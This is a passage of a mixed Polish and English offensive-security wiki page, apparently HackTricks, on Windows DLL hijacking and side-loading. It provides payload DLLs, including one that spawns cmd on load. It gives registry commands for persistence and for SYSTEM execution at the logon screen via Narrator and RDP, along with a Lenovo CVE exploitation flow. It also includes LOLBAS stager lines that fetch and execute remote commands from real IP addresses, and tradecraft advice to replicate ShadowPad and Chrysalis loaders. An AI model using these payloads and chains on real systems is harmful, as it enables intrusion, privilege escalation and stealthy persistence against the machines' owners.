#include<windows.h> #include<stdlib.h> #include<stdio.h>

void Entry (){ //Default function that is executed when the DLL is loaded system(“cmd”); }

BOOL APIENTRY DllMain (HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { switch (ul_reason_for_call){ case DLL_PROCESS_ATTACH: CreateThread(0,0, (LPTHREAD_START_ROUTINE)Entry,0,0,0); break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DEATCH: break; } return TRUE; }

</details>

## Case Study: Narrator OneCore TTS Localization DLL Hijack (Accessibility/ATs)

Windows Narrator.exe nadal próbuje załadować przewidywalny, specyficzny dla języka DLL lokalizacyjny podczas uruchamiania — DLL ten może zostać hijacked, co umożliwia arbitrary code execution i persistence.

Key facts
- Probe path (current builds): `%windir%\System32\speech_onecore\engines\tts\msttsloc_onecoreenus.dll` (EN-US).
- Legacy path (older builds): `%windir%\System32\speech\engine\tts\msttslocenus.dll`.
- If a writable attacker-controlled DLL exists at the OneCore path, it is loaded and `DllMain(DLL_PROCESS_ATTACH)` executes. No exports are required.

Discovery with Procmon
- Filter: `Process Name is Narrator.exe` and `Operation is Load Image` or `CreateFile`.
- Start Narrator and observe the attempted load of the above path.

Minimal DLL
```c
// Build as msttsloc_onecoreenus.dll and place in the OneCore TTS path
BOOL WINAPI DllMain(HINSTANCE h, DWORD r, LPVOID) {
if (r == DLL_PROCESS_ATTACH) {
// Optional OPSEC: DisableThreadLibraryCalls(h);
// Suspend/quiet Narrator main thread, then run payload
// (see PoC for implementation details)
}
return TRUE;
}

OPSEC silence

• Naiwny hijack spowoduje, że Narrator będzie mówił/podświetlał UI. Aby zachować ciszę, podczas attachu wypisz wątki Narratora, otwórz główny wątek (OpenThread(THREAD_SUSPEND_RESUME)) i wywołaj SuspendThread; kontynuuj we własnym wątku. Zobacz PoC po pełny kod.

Trigger and persistence via Accessibility configuration

• User context (HKCU): reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility" /v configuration /t REG_SZ /d "Narrator" /f
• Winlogon/SYSTEM (HKLM): reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility" /v configuration /t REG_SZ /d "Narrator" /f
• Dzięki powyższemu uruchomienie Narrator załaduje wstawiony DLL. Na secure desktop (ekran logowania) naciśnij CTRL+WIN+ENTER, aby uruchomić Narrator; twój DLL wykona się jako SYSTEM na secure desktop.

RDP-triggered SYSTEM execution (lateral movement)

• Allow classic RDP security layer: reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 0 /f
• Połącz się przez RDP z hostem, na ekranie logowania naciśnij CTRL+WIN+ENTER, aby uruchomić Narrator; twój DLL wykona się jako SYSTEM na secure desktop.
• Wykonanie ustaje po zamknięciu sesji RDP — inject/migrate szybko.

Bring Your Own Accessibility (BYOA)

• Możesz sklonować wbudowany wpis Accessibility Tool (AT) w rejestrze (np. CursorIndicator), edytować go, aby wskazywał na dowolny binarny/DLL, zaimportować go, a następnie ustawić configuration na nazwę tego AT. To umożliwia proxy dowolnego wykonania w ramach Accessibility.

Notes

• Zapis pod %windir%\System32 oraz zmiana wartości w HKLM wymaga uprawnień administratora.
• Cała logika payloadu może żyć w DLL_PROCESS_ATTACH; eksporty nie są potrzebne.

Case Study: CVE-2025-1729 - Privilege Escalation Using TPQMAssistant.exe

This case demonstrates Phantom DLL Hijacking in Lenovo’s TrackPoint Quick Menu (TPQMAssistant.exe), tracked as CVE-2025-1729.

Vulnerability Details

• Component: TPQMAssistant.exe located at C:\ProgramData\Lenovo\TPQM\Assistant\.
• Scheduled Task: Lenovo\TrackPointQuickMenu\Schedule\ActivationDailyScheduleTask runs daily at 9:30 AM under the context of the logged-on user.
• Directory Permissions: Writable by CREATOR OWNER, allowing local users to drop arbitrary files.
• DLL Search Behavior: Attempts to load hostfxr.dll from its working directory first and logs “NAME NOT FOUND” if missing, indicating local directory search precedence.

Exploit Implementation

Atakujący może umieścić złośliwy stub hostfxr.dll w tym samym katalogu, wykorzystując brakujący DLL do uzyskania wykonania kodu w kontekście użytkownika:

#include <windows.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD fdwReason, LPVOID lpReserved) {
if (fdwReason == DLL_PROCESS_ATTACH) {
// Payload: display a message box (proof-of-concept)
MessageBoxA(NULL, "DLL Hijacked!", "TPQM", MB_OK);
}
return TRUE;
}

Przebieg ataku

1. Jako zwykły użytkownik, upuść hostfxr.dll do C:\ProgramData\Lenovo\TPQM\Assistant\.
2. Poczekaj aż zadanie zaplanowane uruchomi się o 9:30 w kontekście bieżącego użytkownika.
3. Jeśli administrator jest zalogowany w momencie wykonywania zadania, złośliwy DLL uruchomi się w sesji administratora na poziomie medium integrity.
4. Połącz standardowe UAC bypass techniques, aby podnieść uprawnienia z medium integrity do SYSTEM.

Studium przypadku: MSI CustomAction Dropper + DLL Side-Loading via Signed Host (wsc_proxy.exe)

Threat actors frequently pair MSI-based droppers with DLL side-loading to execute payloads under a trusted, signed process.

Chain overview

• User downloads MSI. A CustomAction runs silently during the GUI install (e.g., LaunchApplication or a VBScript action), reconstructing the next stage from embedded resources.
• The dropper writes a legitimate, signed EXE and a malicious DLL to the same directory (example pair: Avast-signed wsc_proxy.exe + attacker-controlled wsc.dll).
• When the signed EXE is started, Windows DLL search order loads wsc.dll from the working directory first, executing attacker code under a signed parent (ATT&CK T1574.001).

MSI analysis (what to look for)

• CustomAction table:
• Look for entries that run executables or VBScript. Example suspicious pattern: LaunchApplication executing an embedded file in background.
• In Orca (Microsoft Orca.exe), inspect CustomAction, InstallExecuteSequence and Binary tables.
• Embedded/split payloads in the MSI CAB:
• Administrative extract: msiexec /a package.msi /qb TARGETDIR=C:\out
• Or use lessmsi: lessmsi x package.msi C:\out
• Look for multiple small fragments that are concatenated and decrypted by a VBScript CustomAction. Common flow:

' VBScript CustomAction (high level)
' 1) Read multiple fragment files from the embedded CAB (e.g., f0.bin, f1.bin, ...)
' 2) Concatenate with ADODB.Stream or FileSystemObject
' 3) Decrypt using a hardcoded password/key
' 4) Write reconstructed PE(s) to disk (e.g., wsc_proxy.exe and wsc.dll)

Praktyczne sideloading przy użyciu wsc_proxy.exe

• Umieść te dwa pliki w tym samym folderze:
• wsc_proxy.exe: legalnie podpisany host (Avast). Proces próbuje załadować wsc.dll po nazwie z katalogu, w którym się znajduje.
• wsc.dll: attacker DLL. Jeśli nie są wymagane żadne konkretne exports, DllMain może wystarczyć; w przeciwnym razie zbuduj proxy DLL i przekieruj wymagane exports do oryginalnej biblioteki, uruchamiając payload w DllMain.
• Zbuduj minimalny DLL payload:

// x64: x86_64-w64-mingw32-gcc payload.c -shared -o wsc.dll
#include <windows.h>
BOOL WINAPI DllMain(HINSTANCE h, DWORD r, LPVOID) {
if (r == DLL_PROCESS_ATTACH) {
WinExec("cmd.exe /c whoami > %TEMP%\\wsc_sideload.txt", SW_HIDE);
}
return TRUE;
}

• Dla wymagań eksportu użyj frameworka proxy (np. DLLirant/Spartacus) do wygenerowania forwarding DLL, który również wykona twój payload.

• Ta technika opiera się na rozwiązywaniu nazw DLL przez plik binarny hosta. Jeśli host używa ścieżek absolutnych lub flag bezpiecznego ładowania (np. LOAD_LIBRARY_SEARCH_SYSTEM32/SetDefaultDllDirectories), hijack może się nie powieść.

• KnownDLLs, SxS i forwarded exports mogą wpływać na priorytet ładowania i należy je uwzględnić przy wyborze pliku binarnego hosta oraz zestawu eksportów.

Podpisane triady + zaszyfrowane payloads (studium przypadku ShadowPad)

Check Point opisał, jak Ink Dragon wdraża ShadowPad, korzystając z trójelementowej triady plików, co pozwala wtopić się w legalne oprogramowanie, jednocześnie przechowując główny payload zaszyfrowany na dysku:

1. Signed host EXE – dostawcy tacy jak AMD, Realtek czy NVIDIA są nadużywani (vncutil64.exe, ApplicationLogs.exe, msedge_proxyLog.exe). Atakujący zmieniają nazwę wykonywalnego pliku, aby wyglądał jak binarka Windows (np. conhost.exe), ale podpis Authenticode pozostaje ważny.
2. Malicious loader DLL – upuszczany obok EXE z oczekiwaną nazwą (vncutil64loc.dll, atiadlxy.dll, msedge_proxyLogLOC.dll). DLL jest zwykle binarnym plikiem MFC zamaskowanym za pomocą frameworka ScatterBrain; jej jedynym zadaniem jest znaleźć zaszyfrowany blob, odszyfrować go i reflectively map ShadowPad.
3. Encrypted payload blob – często przechowywany jako <name>.tmp w tym samym katalogu. Po memory-mappingu odszyfrowanego payloadu loader usuwa plik TMP, by zniszczyć dowody śledcze.

Tradecraft notes:

• Renaming the signed EXE (while keeping the original OriginalFileName in the PE header) lets it masquerade as a Windows binary yet retain the vendor signature, so replicate Ink Dragon’s habit of dropping conhost.exe-looking binaries that are really AMD/NVIDIA utilities.
• Because the executable stays trusted, most allowlisting controls only need your malicious DLL to sit alongside it. Focus on customizing the loader DLL; the signed parent can typically run untouched.
• ShadowPad’s decryptor expects the TMP blob to live next to the loader and be writable so it can zero the file after mapping. Keep the directory writable until the payload loads; once in memory the TMP file can safely be deleted for OPSEC.

LOLBAS stager + staged archive sideloading chain (finger → tar/curl → WMI)

Operatorzy łączą DLL sideloading z LOLBAS tak, że jedynym niestandardowym artefaktem na dysku jest złośliwy DLL obok zaufanego EXE:

• Remote command loader (Finger): Ukryty PowerShell uruchamia cmd.exe /c, pobiera komendy z serwera Finger i przekazuje je do cmd:

powershell.exe Start-Process cmd -ArgumentList '/c finger Galo@91.193.19.108 | cmd' -WindowStyle Hidden

• finger user@host pobiera tekst z TCP/79; | cmd wykonuje odpowiedź serwera, pozwalając operatorom rotować drugą fazę po stronie serwera.

• Built-in download/extract: Pobierz archiwum z nieszkodliwym rozszerzeniem, wypakuj je i przygotuj sideload target oraz DLL w losowym folderze %LocalAppData%:

$base = "$Env:LocalAppData"; $dir = Join-Path $base (Get-Random); curl -s -L -o "$dir.pdf" 79.141.172.212/tcp; mkdir "$dir"; tar -xf "$dir.pdf" -C "$dir"; $exe = "$dir\intelbq.exe"

• curl -s -L ukrywa postęp i podąża za przekierowaniami; tar -xf używa wbudowanego w Windows tar.

• WMI/CIM launch: Uruchom EXE przez WMI tak, aby telemetryka pokazywała proces utworzony przez CIM, podczas gdy ładuje on współlokowany DLL:

Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = "`"$exe`""}

• Działa z binarkami, które preferują lokalne DLL (np. intelbq.exe, nearby_share.exe); payload (np. Remcos) uruchamia się pod zaufaną nazwą.

• Hunting: Włącz alerty dla forfiles gdy występują razem /p, /m i /c; rzadkie poza skryptami administracyjnymi.

Case Study: NSIS dropper + Bitdefender Submission Wizard sideload (Chrysalis)

Ostatnie włamanie Lotus Blossom nadużyło zaufanego łańcucha aktualizacji, aby dostarczyć droppera spakowanego NSIS, który przygotowywał DLL sideload oraz całkowicie in-memory payloady.

Tradecraft flow

• update.exe (NSIS) tworzy %AppData%\Bluetooth, oznacza go HIDDEN, upuszcza przemianowany Bitdefender Submission Wizard BluetoothService.exe, złośliwy log.dll i zaszyfrowany blob BluetoothService, a następnie uruchamia EXE.
• Host EXE importuje log.dll i wywołuje LogInit/LogWrite. LogInit mmap-loads blob; LogWrite odszyfrowuje go przy użyciu niestandardowego strumienia opartego na LCG (stałe 0x19660D / 0x3C6EF35F, materiał klucza wyprowadzony z wcześniejszego hasha), nadpisuje bufor plaintext shellcode, zwalnia tymczasowe zasoby i skacze do niego.
• Aby uniknąć IAT, loader rozwiązuje API przez haszowanie nazw eksportów używając FNV-1a basis 0x811C9DC5 + prime 0x1000193, następnie stosuje Murmur-style avalanche (0x85EBCA6B) i porównuje z solonymi docelowymi hashami.

Main shellcode (Chrysalis)

• Dekoduje moduł główny przypominający PE powtarzając add/XOR/sub z kluczem gQ2JR&9; przez pięć przebiegów, następnie dynamicznie ładuje Kernel32.dll → GetProcAddress, aby dokończyć rozwiązywanie importów.
• Odbudowuje ciągi nazw DLL w czasie wykonania poprzez per-znakowe obracanie bitów/XOR, po czym ładuje oleaut32, advapi32, shlwapi, user32, wininet, ole32, shell32.
• Używa drugiego resolvera, który przegląda PEB → InMemoryOrderModuleList, parsuje każdą tabelę eksportów w blokach po 4 bajty z mieszaniną w stylu Murmur i odwołuje się do GetProcAddress tylko jeśli hash nie zostanie znaleziony.

Embedded configuration & C2

• Konfiguracja znajduje się wewnątrz upuszczonego pliku BluetoothService na offset 0x30808 (rozmiar 0x980) i jest RC4-decryptowana kluczem qwhvb^435h&*7, ujawniając URL C2 i User-Agent.
• Beacony budują profil hosta rozdzielony kropkami, dopisują prefiks 4Q, po czym RC4-encryptują z kluczem vAuig34%^325hGV przed HttpSendRequestA przez HTTPS. Odpowiedzi są RC4-decrypted i dystrybuowane przez switch tagów (4T shell, 4V uruchomienie procesu, 4W/4X zapis pliku, 4Y odczyt/wyciek, 4\\ odinstalowanie, 4 enumeracja dysków/plików + przypadki chunked transfer).
• Tryb wykonania jest sterowany argumentami CLI: brak argumentów = instalacja persistence (service/Run key) wskazująca na -i; -i ponownie uruchamia się z -k; -k pomija instalację i uruchamia payload.

Alternate loader observed

• To samo włamanie upuściło Tiny C Compiler i uruchomiło svchost.exe -nostdlib -run conf.c z C:\ProgramData\USOShared\, z libtcc.dll obok. Dostarczony przez atakującego kod źródłowy C zawierał embedded shellcode, został skompilowany i uruchomiony in-memory bez zapisywania PE na dysku. Powtórz to za pomocą:

C:\ProgramData\USOShared\tcc.exe -nostdlib -run conf.c

• Ta faza TCC-based compile-and-run zaimportowała w czasie wykonywania Wininet.dll i pobrała second-stage shellcode z hardcoded URL, tworząc elastyczny loader, który podszywa się pod compiler run.

Referencje

• Red Canary – Intelligence Insights: January 2026
• CVE-2025-1729 - Privilege Escalation Using TPQMAssistant.exe
• Microsoft Store - TPQM Assistant UWP
• https://medium.com/@pranaybafna/tcapt-dll-hijacking-888d181ede8e
• https://cocomelonc.github.io/pentest/2021/09/24/dll-hijacking-1.html
• Check Point Research – Nimbus Manticore Deploys New Malware Targeting Europe
• TrustedSec – Hack-cessibility: When DLL Hijacks Meet Windows Helpers
• PoC – api0cradle/Narrator-dll
• Sysinternals Process Monitor
• Unit 42 – Digital Doppelgangers: Anatomy of Evolving Impersonation Campaigns Distributing Gh0st RAT
• Check Point Research – Inside Ink Dragon: Revealing the Relay Network and Inner Workings of a Stealthy Offensive Operation
• Rapid7 – The Chrysalis Backdoor: A Deep Dive into Lotus Blossom’s toolkit
• 0xdf – HTB Bruno ZipSlip → DLL hijack chain

Tip

Ucz się i ćwicz Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Ucz się i ćwicz Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Wsparcie dla HackTricks

• Sprawdź plany subskrypcyjne!
• Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @hacktricks_live.
• Dziel się trikami hackingowymi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów na githubie.